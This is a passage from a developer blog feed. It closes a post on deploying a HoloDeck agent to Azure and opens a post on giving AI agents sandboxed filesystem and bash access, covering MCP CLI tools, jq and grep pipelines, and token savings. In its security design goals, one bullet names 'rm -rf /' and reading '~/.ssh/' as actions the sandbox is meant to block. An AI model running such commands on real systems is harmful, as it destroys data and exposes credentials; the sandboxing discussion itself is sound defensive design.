&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health


{
  "status": "healthy",
  "agent_name": "customer-support",
  "agent_ready": true,
  "active_sessions": 0,
  "uptime_seconds": 14.41
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent is healthy and ready to receive requests.&lt;/p&gt;

&lt;p&gt;To chat with the agent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -X POST https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/chat \
  -H "Content-Type: application/json" \
  -d '{"message": "What is your return policy?"}'

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Managing Deployments
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Check Status
&lt;/h3&gt;

&lt;p&gt;At any time, you can check the deployment status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy status agent.yaml


Deployment Status
  Service: customer-support
  Provider: azure
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Updated: 2026-01-28T00:27:28.537340+00:00

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tear Down
&lt;/h3&gt;

&lt;p&gt;When you're done, clean up the deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy destroy agent.yaml

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This removes the Container App from Azure. The image remains in the registry for future deployments.&lt;/p&gt;

&lt;h3&gt;
  
  
  State Tracking
&lt;/h3&gt;

&lt;p&gt;HoloDeck tracks deployment state locally in &lt;code&gt;.holodeck/deployments.json&lt;/code&gt;. This allows it to manage updates and teardowns without querying the cloud provider each time.&lt;/p&gt;
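&lt;p&gt;If you want to inspect that state yourself, a minimal sketch follows. The schema is an assumption based on the &lt;code&gt;deploy status&lt;/code&gt; output shown above (service, provider, status, URL); the real file format may differ.&lt;/p&gt;

```python
# Sketch of reading HoloDeck's local deployment state. The keys used here
# are assumed from the CLI output; .holodeck/deployments.json may differ.
import json
from pathlib import Path

def load_deployments(project_root="."):
    state_file = Path(project_root) / ".holodeck" / "deployments.json"
    if not state_file.exists():
        return {}
    return json.loads(state_file.read_text())

def deployment_url(state, service):
    # Assumed layout: {"customer-support": {"provider": "azure", "url": ...}}
    return state.get(service, {}).get("url")
```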

&lt;h2&gt;
  
  
  What About AWS and GCP?
&lt;/h2&gt;

&lt;p&gt;AWS App Runner and GCP Cloud Run support are coming soon. The configuration looks similar:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# AWS App Runner (planned)
deployment:
  target:
    provider: aws
    aws:
      region: us-east-1
      cpu: 1
      memory: 2048

# GCP Cloud Run (planned)
deployment:
  target:
    provider: gcp
    gcp:
      project_id: my-project
      region: us-central1
      memory: 512Mi

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For now, you can use &lt;code&gt;holodeck deploy build&lt;/code&gt; to create the container image, push it to any registry, and deploy manually to your preferred platform. See the &lt;a href="https://docs.useholodeck.ai/guides/deployment/#diy-deployment" rel="noopener noreferrer"&gt;DIY Deployment section&lt;/a&gt; in the deployment guide for details.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;We went from a YAML configuration to a production API endpoint in four steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Add deployment config&lt;/strong&gt; to agent.yaml&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build&lt;/strong&gt; with &lt;code&gt;holodeck deploy build&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Push&lt;/strong&gt; the image to a registry&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy&lt;/strong&gt; with &lt;code&gt;holodeck deploy run&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;No Dockerfiles to write. No Kubernetes to configure. No infrastructure to manage.&lt;/p&gt;

&lt;p&gt;The full deployment documentation is available in the &lt;a href="https://docs.useholodeck.ai/guides/deployment" rel="noopener noreferrer"&gt;Deployment Guide&lt;/a&gt;. Give it a try with your own agents—and let us know how it goes.&lt;/p&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>azure</category>
      <category>devops</category>
    </item>
    <item>
      <title>Building a Filesystem + Bash Based Agentic Memory System (Part 1)</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 16 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/building-a-filesystem-bash-based-agentic-memory-system-part-1-4nan</link>
      <guid>https://dev.to/jeremiahbarias/building-a-filesystem-bash-based-agentic-memory-system-part-1-4nan</guid>
      <description>&lt;h1&gt;
  
  
  Building a Filesystem + Bash Based Agentic Memory System (Part 1)
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2l7pu2vbntw6q4wsi3a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2l7pu2vbntw6q4wsi3a.png" alt=" " width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Part 1 of 3: Research, Patterns, and Design Goals&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;A few days ago, I wrote about &lt;a href="https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh"&gt;how I reduced my agent's token consumption by 83%&lt;/a&gt; by implementing a &lt;code&gt;ToolFilterManager&lt;/code&gt; that dynamically selects which tools to expose based on query relevance. That tackled the first major pattern from Anthropic's &lt;a href="https://www.anthropic.com/engineering/advanced-tool-use" rel="noopener noreferrer"&gt;Advanced Tool Use&lt;/a&gt; article—the &lt;strong&gt;tool search tool&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;But that article describes &lt;em&gt;three&lt;/em&gt; patterns, and I've been eyeing the second one: &lt;strong&gt;programmatic tool calling&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The idea is to let Claude "orchestrate tools through code rather than through individual API round-trips." Instead of the model making 20 sequential tool calls (each requiring an inference pass), it writes a single code block that executes all of them, processing outputs in a sandboxed environment without inflating context. Anthropic reports a 37% token reduction on complex tasks with this approach.&lt;/p&gt;
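&lt;p&gt;A toy sketch makes the pattern concrete. Here &lt;code&gt;get_invoice_total&lt;/code&gt; is a hypothetical stand-in for a real tool call; the point is that the loop and the aggregation happen in executed code, and only the final number re-enters the model's context.&lt;/p&gt;

```python
# Toy illustration of programmatic tool calling: one executed block replaces
# N sequential tool-call inference round-trips.
def get_invoice_total(customer_id):
    # Hypothetical stand-in for a real tool backend.
    fake_backend = {"cust-1": 120, "cust-2": 80, "cust-3": 55}
    return fake_backend.get(customer_id, 0)

customers = ["cust-1", "cust-2", "cust-3"]
# The intermediate per-customer results never enter the model's context;
# only the aggregate does.
total = sum(get_invoice_total(c) for c in customers)
print(total)  # 255
```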

&lt;p&gt;This got me thinking: what if we took this further? What if, instead of code execution, we gave agents direct filesystem and bash access?&lt;/p&gt;

&lt;p&gt;Welcome to Part 1 of this rabbit hole.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are we talking about?
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why Filesystem + Bash?&lt;/li&gt;
&lt;li&gt;Existing Work&lt;/li&gt;
&lt;li&gt;How It Works: Traditional vs Filesystem-Based&lt;/li&gt;
&lt;li&gt;Bridging the Gap: MCP as CLI&lt;/li&gt;
&lt;li&gt;Design Goals for My Experiment&lt;/li&gt;
&lt;li&gt;What This Isn't&lt;/li&gt;
&lt;li&gt;Next Up&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why Filesystem + Bash?
&lt;/h2&gt;

&lt;p&gt;Vercel published a piece on &lt;a href="https://vercel.com/blog/how-to-build-agents-with-filesystems-and-bash" rel="noopener noreferrer"&gt;building agents with filesystems and bash&lt;/a&gt; that crystallized something I'd been mulling over. Their core insight:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;LLMs have been trained on massive amounts of code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Models already know how to &lt;code&gt;grep&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;ls&lt;/code&gt;. They've seen millions of examples of bash usage during training. You don't need to teach them your custom &lt;code&gt;SearchCodebase&lt;/code&gt; tool—they already know &lt;code&gt;grep -r "pricing objection" ./transcripts/&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Their results were compelling: a sales call summarization agent went from $1.00 to $0.25 per call on Claude Opus while &lt;em&gt;improving&lt;/em&gt; output quality. That's not a typo—cheaper AND better.&lt;/p&gt;

&lt;p&gt;The reason? &lt;strong&gt;Contextual precision.&lt;/strong&gt; Vector search gives you semantic approximations. Prompt stuffing hits token limits. But &lt;code&gt;grep -r&lt;/code&gt; returns exactly what you asked for, nothing more.&lt;/p&gt;

&lt;p&gt;If you've used Claude Code, you've seen this pattern in action. The agent doesn't call abstract tools—it has a filesystem and runs commands against it. The model thinks in &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;head&lt;/code&gt;, &lt;code&gt;tail&lt;/code&gt;, and &lt;code&gt;jq&lt;/code&gt;, not &lt;code&gt;ReadFile(path="/foo/bar")&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Existing Work
&lt;/h2&gt;

&lt;p&gt;I'm not the first person down this path.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://docs.turso.tech/agentfs/introduction" rel="noopener noreferrer"&gt;AgentFS&lt;/a&gt;&lt;/strong&gt; from Turso is a filesystem abstraction built on SQLite. Their pitch: "copy-on-write isolation, letting agents safely modify files while keeping your original data untouched." Everything lives in a single portable SQLite database—easy to snapshot, share, and audit. They've built CLI wrappers and SDKs for TypeScript, Python, and Rust. It's marked as ALPHA and explicitly not for production, but the architecture is interesting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; is the obvious reference implementation. Anthropic gave their coding agent real filesystem access with sandboxing, and it works remarkably well. The agent naturally uses bash patterns it learned during training.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vercel's &lt;code&gt;bash-tool&lt;/code&gt;&lt;/strong&gt; provides sandboxed bash execution alongside their AI SDK. Their examples show domain-to-filesystem mappings: customer support data organized by customer ID with tickets and conversations as nested files, sales transcripts alongside CRM records.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;mcp-cli&lt;/a&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;a href="https://github.com/f/mcptools" rel="noopener noreferrer"&gt;mcptools&lt;/a&gt;&lt;/strong&gt; enable calling MCP servers from the command line. This is the missing link—it lets agents invoke MCP tools via bash and redirect output to files, bridging the gap between structured tool definitions and filesystem-based execution.&lt;/p&gt;

&lt;h2&gt;
  
  
  How It Works: Traditional vs Filesystem-Based
&lt;/h2&gt;

&lt;p&gt;Before diving deeper, let me illustrate the fundamental difference between these approaches.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional Agentic Tool Calling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  TRADITIONAL TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends ALL 16 tool definitions)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll use     │
                              │ search_docs &amp;amp; │
                              │ query_database│
                              │ tools"        │
                              └───────┬───────┘
                                      │
                                      ▼
                         Agent Executes Tools
                         search_docs("pricing")
                         query_database("customers")
                                      │
                                      ▼
                      ┌───────────────────────────────┐
                      │  RAW OUTPUT (1000s of tokens!)│
                      │  [full doc contents,          │
                      │   all 500 DB rows...]         │
                      └───────────────┬───────────────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │  (processes   │
                              │   ENTIRE      │
                              │   output)     │
                              └───────┬───────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │   Response    │
                              └───────────────┘

  Problems:
  ├── 🔴 All tool definitions sent every request (5,888 tokens just for schemas!)
  ├── 🔴 Full tool output dumped into context (DB query = 500 rows in context)
  └── 🔴 Each tool call = 1 inference round-trip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Filesystem + Bash Based Tool Calling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  FILESYSTEM + BASH TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends sandbox tool + fs structure)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll explore │
                              │  the data:    │
                              │  ls, cat..."  │
                              └───────┬───────┘
                                      │
            ┌─────────────────────────┴─────────────────────────┐
            │                                                   │
            ▼                                                   │
  ┌───────────────────────┐                                     │
  │   Sandbox Execution   │                                     │
  │   $ ls ./customers/   │                                     │
  │   &amp;gt; acme/ globex/     │                                     │
  │     initech/ ...      │──────┐                              │
  └───────────────────────┘      │                              │
                                 │  (output written to file     │
                                 │   or returned as path)       │
                                 ▼                              │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Found customers. Now:    │                │
                  │   grep -r 'pricing' ./docs │                │
                  │   | head -20"              │                │
                  └─────────────┬──────────────┘                │
                                │                               │
                                ▼                               │
                  ┌───────────────────────┐                     │
                  │   Sandbox Execution   │                     │
                  │   $ grep -r 'pricing' │                     │
                  │     ./docs | head -20 │                     │
                  └─────────────┬─────────┘                     │
                                │                               │
                                ▼                               │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Need more detail on      │                │
                  │   enterprise tier:         │                │
                  │   awk '/enterprise/,/---/' │◀───────────────┘
                  │     ./docs/pricing.md"     │     (loop until
                  └─────────────┬──────────────┘      sufficient
                                │                     context)
                                ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (with only  │
                        │   relevant   │
                        │   context)   │
                        └──────────────┘

  Benefits:
  ├── 🟢 Minimal tool definitions (just "sandbox" tool)
  ├── 🟢 Agent controls what enters context (grep, head, awk filter results)
  ├── 🟢 LLM already knows bash (trained on millions of examples)
  └── 🟢 Composable commands (pipes, redirects, filters)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Key Insight
&lt;/h3&gt;

&lt;p&gt;The traditional approach treats the LLM as a passive consumer—it requests data and gets &lt;em&gt;everything&lt;/em&gt; back. The filesystem approach treats the LLM as an active explorer—it navigates, filters, and retrieves only what it needs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional:    "Give me all the data, I'll figure it out"
                 └── Context explodes, tokens burn 🔥

Filesystem:     "Let me look around and grab what I need"
                 └── Context stays lean, costs drop 📉
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Bridging the Gap: MCP as CLI
&lt;/h2&gt;

&lt;p&gt;The diagrams above assume files already exist in the sandbox. But where do they come from?&lt;/p&gt;

&lt;p&gt;This is where MCP CLI tools bridge the gap. Instead of MCP servers returning results directly into the LLM's context, they can be invoked as bash commands that write output to files.&lt;/p&gt;

&lt;h3&gt;
  
  
  MCP as CLI Commands
&lt;/h3&gt;

&lt;p&gt;Several tools enable calling MCP servers from the command line:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;mcp-cli&lt;/a&gt;&lt;/strong&gt; by Phil Schmid uses a clean syntax:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List available servers and tools&lt;/span&gt;
mcp-cli

&lt;span class="c"&gt;# Inspect a tool's schema&lt;/span&gt;
mcp-cli filesystem/read_file

&lt;span class="c"&gt;# Execute a tool&lt;/span&gt;
mcp-cli filesystem/read_file &lt;span class="s1"&gt;'{"path": "./README.md"}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/f/mcptools" rel="noopener noreferrer"&gt;mcptools&lt;/a&gt;&lt;/strong&gt; offers similar functionality:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mcp call read_file &lt;span class="nt"&gt;--params&lt;/span&gt; &lt;span class="s1"&gt;'{"path":"README.md"}'&lt;/span&gt; npx &lt;span class="nt"&gt;-y&lt;/span&gt; @modelcontextprotocol/server-filesystem ~
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Integration Pattern
&lt;/h3&gt;

&lt;p&gt;Here's how traditional tools integrate with the filesystem approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  DATA INGESTION: MCP → SANDBOX FILESYSTEM
═══════════════════════════════════════════════════════════════════════

  ┌─ LLM decides it needs customer data ───────────────────────────────
  │
  │  "I need to query the database for enterprise customers.
  │   Let me fetch that data into my workspace."
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ SANDBOX EXECUTION ────────────────────────────────────────────────
  │
  │  $ mcp-cli database/query_customers '{"tier": "enterprise"}' \
  │      &amp;gt; ./sandbox/data/customers.json
  │
  │  $ mcp-cli vectorstore/search '{"query": "pricing policy"}' \
  │      &amp;gt; ./sandbox/docs/pricing_results.json
  │
  │  $ mcp-cli brave-search/web_search '{"query": "competitor pricing"}' \
  │      &amp;gt; ./sandbox/research/competitors.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               │  (data now exists as files)
                               ▼
  ┌─ SANDBOX FILESYSTEM STATE ─────────────────────────────────────────
  │
  │  ./sandbox/
  │  ├── data/
  │  │   └── customers.json          # 500 customer records
  │  ├── docs/
  │  │   └── pricing_results.json    # vectorstore search results
  │  └── research/
  │      └── competitors.json        # web search results
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ LLM explores with bash (only pulls what it needs into context) ───
  │
  │  $ jq '.customers | length' ./sandbox/data/customers.json
  │  &amp;gt; 500
  │
  │  $ jq '.customers[] | select(.revenue &amp;gt; 1000000) | .name' \
  │      ./sandbox/data/customers.json | head -10
  │  &amp;gt; "Acme Corp"
  │  &amp;gt; "Globex Inc"
  │  &amp;gt; ...
  │
  │  $ grep -l "enterprise" ./sandbox/docs/*.json
  │  &amp;gt; ./sandbox/docs/pricing_results.json
  │
  └────────────────────────────────────────────────────────────────────
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Matters
&lt;/h3&gt;

&lt;p&gt;The traditional approach would send all 500 customer records directly into context. With filesystem-based execution:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;MCP call writes to file&lt;/strong&gt; → Data exists but isn't in context yet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent uses &lt;code&gt;jq&lt;/code&gt; to count&lt;/strong&gt; → Only "500" enters context (3 tokens)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent filters with &lt;code&gt;jq&lt;/code&gt;&lt;/strong&gt; → Only 10 company names enter context (~30 tokens)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agent gets what it needs&lt;/strong&gt; → Instead of 500 records (~50,000 tokens)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Phil Schmid's &lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;research on mcp-cli&lt;/a&gt; showed this pattern reduces tool-related token consumption from ~47,000 tokens to ~400 tokens—&lt;strong&gt;a 99% reduction&lt;/strong&gt;—because agents discover and use tools just-in-time rather than loading all definitions upfront.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Complete Flow
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  COMPLETE FILESYSTEM + MCP FLOW
═══════════════════════════════════════════════════════════════════════

  User Query: "Which enterprise customers mentioned pricing concerns?"
                               │
                               ▼
  ┌─ STEP 1: Fetch data via MCP CLI ───────────────────────────────────
  │
  │ $ mcp-cli database/query_customers '{"tier":"enterprise"}' \
  │     &amp;gt; ./data/customers.json
  │
  │ $ mcp-cli crm/get_conversations '{"customer_ids":"$CUSTOMER_IDS"}' \
  │     &amp;gt; ./data/conversations.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 2: Explore with bash ────────────────────────────────────────
  │
  │ $ jq -r '.[] | .id' ./data/customers.json | wc -l
  │ &amp;gt; 47
  │
  │ $ grep -l "pricing" ./data/conversations.json
  │ &amp;gt; (matches found)
  │
  │ $ jq '.[] | select(.text | contains("pricing")) | {customer, text}' \
  │     ./data/conversations.json &amp;gt; ./analysis/pricing_mentions.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 3: Extract only relevant context ────────────────────────────
  │
  │ $ cat ./analysis/pricing_mentions.json | head -50
  │ &amp;gt; [{"customer": "Acme", "text": "pricing seems high..."},
  │ &amp;gt;  {"customer": "Globex", "text": "need better pricing..."}]
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (informed   │
                        │   by ~50     │
                        │   relevant   │
                        │   lines)     │
                        └──────────────┘

  Token savings:
  ├── Without filesystem: 47 customers × 20 conversations × ~500 tokens = 470,000 tokens
  └── With filesystem: ~200 tokens (just the relevant pricing mentions)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Design Goals for My Experiment
&lt;/h2&gt;

&lt;p&gt;I want to build something that integrates with &lt;a href="https://github.com/justinbarias/holodeck-ai" rel="noopener noreferrer"&gt;Holodeck&lt;/a&gt;, which uses Semantic Kernel for agent orchestration. Here's what I'm aiming for:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Filesystem Security
&lt;/h3&gt;

&lt;p&gt;Letting LLMs run bash commands on your actual filesystem is... not great. The horror stories write themselves.&lt;/p&gt;

&lt;p&gt;My approach:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Copy-on-write isolation.&lt;/strong&gt; Like AgentFS, the agent operates in a sandboxed directory. Writes don't touch original files until explicitly committed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit logging.&lt;/strong&gt; Every file operation gets logged. Every. Single. One. AgentFS makes this queryable, and I want the same—know what the agent did, when, and be able to roll it back.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Path restrictions.&lt;/strong&gt; The agent only sees paths within its sandbox. No &lt;code&gt;rm -rf /&lt;/code&gt; accidents, no reading &lt;code&gt;~/.ssh/&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is non-negotiable for anything beyond toy experiments.&lt;/p&gt;
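&lt;p&gt;To make the path-restriction idea concrete, here's a minimal sketch (names like &lt;code&gt;SandboxGuard&lt;/code&gt; are hypothetical, not actual Holodeck API): resolve every candidate path and reject anything that lands outside the sandbox root.&lt;/p&gt;

```python
from pathlib import Path

class SandboxGuard:
    """Reject any path that resolves outside the sandbox root."""

    def __init__(self, root: str):
        # resolve() collapses symlinks and ".." segments up front
        self.root = Path(root).resolve()

    def check(self, candidate: str) -> Path:
        resolved = (self.root / candidate).resolve()
        # a path is inside the sandbox iff the root is one of its parents
        if self.root != resolved and self.root not in resolved.parents:
            raise PermissionError(f"path escapes sandbox: {candidate}")
        return resolved
```

&lt;p&gt;String-prefix checks aren't enough here; resolving first is what catches &lt;code&gt;../&lt;/code&gt; tricks and symlinked escape routes.&lt;/p&gt;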

&lt;h3&gt;
  
  
  2. Token and Context Reduction
&lt;/h3&gt;

&lt;p&gt;This is where the programmatic tool calling pattern really shines.&lt;/p&gt;

&lt;p&gt;In traditional tool calling:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Model requests tool call&lt;/li&gt;
&lt;li&gt;Tool executes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Entire output goes back into context&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Model processes output&lt;/li&gt;
&lt;li&gt;Repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Query a database with 1000 rows? That's 1000 rows in your context window. Every. Single. Time.&lt;/p&gt;

&lt;p&gt;The filesystem pattern flips this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Command outputs get written to files&lt;/li&gt;
&lt;li&gt;To access results, the agent runs CLI commands: &lt;code&gt;head -20 results.json&lt;/code&gt;, &lt;code&gt;jq '.users[] | .name' data.json&lt;/code&gt;, &lt;code&gt;grep -c "error" logs.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;The agent pulls in only what it needs, when it needs it, in the format it needs it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is how Claude Code handles large codebases without blowing through context limits. It's also why Vercel saw their costs drop 75%.&lt;/p&gt;
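&lt;p&gt;A rough sketch of that flip (hypothetical names, not the actual Holodeck implementation): the tool wrapper writes its full payload to the sandbox and hands back only a path plus a size hint.&lt;/p&gt;

```python
import json
from pathlib import Path

def run_tool_to_file(tool_output: list, out_dir: str, name: str) -> str:
    """Persist a tool's full output; only a one-line summary enters context."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    path = out / f"{name}.json"
    path.write_text(json.dumps(tool_output))
    # the agent sees this summary instead of the 1000 rows
    return f"{path} ({len(tool_output)} records)"
```

&lt;p&gt;The agent can then &lt;code&gt;jq&lt;/code&gt; or &lt;code&gt;head&lt;/code&gt; the file to pull in only the rows it actually needs.&lt;/p&gt;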

&lt;h3&gt;
  
  
  3. Integration with Semantic Kernel Tool Calling
&lt;/h3&gt;

&lt;p&gt;Here's where I want to experiment. Holodeck already has tool definitions—vectorstore searches, MCP servers, custom functions. What if these could execute in "filesystem mode"?&lt;/p&gt;

&lt;p&gt;Imagine a &lt;code&gt;search_knowledge_base&lt;/code&gt; tool that, instead of returning results directly:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Runs as a subprocess&lt;/li&gt;
&lt;li&gt;Writes results to &lt;code&gt;./sandbox/outputs/search_001.json&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Returns just the path to the agent&lt;/li&gt;
&lt;li&gt;Lets the agent &lt;code&gt;cat&lt;/code&gt; or &lt;code&gt;jq&lt;/code&gt; the file as needed&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You get structured tool definitions for discoverability (the model knows what tools exist), but filesystem semantics for execution (the model controls what data actually enters context).&lt;/p&gt;

&lt;p&gt;This could layer nicely with the tool search pattern I already built. Filter tools dynamically, &lt;em&gt;then&lt;/em&gt; execute them in a sandboxed filesystem. Best of both worlds.&lt;/p&gt;

&lt;p&gt;What might this look like in practice? Today, Holodeck tools are defined like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;knowledge_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vectorstore&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;product-docs&lt;/span&gt;

  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcp&lt;/span&gt;
